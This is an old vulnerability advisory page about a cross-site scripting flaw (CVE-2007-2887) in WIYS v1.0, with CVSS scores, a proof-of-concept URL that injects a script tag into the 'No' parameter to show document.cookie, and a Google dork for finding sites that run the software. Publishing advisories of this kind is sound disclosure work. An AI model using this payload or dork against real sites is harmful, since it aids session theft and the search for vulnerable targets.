Bug: WIYS v1.0 Cross-Site Scripting Vulnerability ( Ascii Version )

Search:
WLB2

WIYS v1.0 Cross-Site Scripting Vulnerability

Published
Credit
Risk
2007.06.01
vagrant
Low
CWE
CVE
Local
Remote
N/A
CVE-2007-2887
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
4.3/10
2.9/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
None
Partial
None

WIYS v1.0 Cross-Site Scripting Vulnerability - (05.24.2007) (NEW)

Vulnerability:
http://www.target.com/index.php?Page=Sayfa&No="><script>alert(document.c
ookie)</script>

Vulnerable: WIYS v1.0

Google d0rk: Bu site FORSNET tarafından WİYS Yazılımı? ile hazırlanmı&#254;tır.

Script : http://www.forsnet.com.tr/yazilim/wiys.html

----------------------------------------------- >>>

Credits : Vagrant

Contact : kernel-32 (at) hotmail (dot) com [email concealed]

Site : e-hack.org

05.24.2007

_________________________________________________________________
Dikkatsiz mesajla&#254;ma tehlikelidir!
http://www.communicationevolved.com/tr-tr/

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version